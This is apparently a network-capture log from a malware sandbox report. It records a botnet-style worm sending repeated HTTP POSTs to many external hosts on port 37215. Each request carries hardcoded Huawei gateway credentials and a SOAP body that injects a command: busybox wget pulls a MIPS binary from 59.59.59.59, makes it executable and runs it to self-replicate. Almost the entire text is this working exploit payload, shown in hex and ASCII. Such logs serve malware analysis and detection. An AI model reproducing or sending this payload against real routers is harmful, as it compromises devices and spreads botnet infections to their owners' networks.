                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1716192.168.2.1541140157.241.11.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.948867083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1717192.168.2.155213041.64.96.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.948885918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1718192.168.2.154261241.132.226.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.949014902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1719192.168.2.155836241.110.253.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.952028990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1720192.168.2.1551946197.163.132.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.952094078 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1721192.168.2.1548008163.89.61.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.953176975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1722192.168.2.155918241.241.11.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.957493067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1723192.168.2.1547652197.12.218.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.958690882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1724192.168.2.155016436.156.146.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.966617107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1725192.168.2.1536924133.45.208.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.966671944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
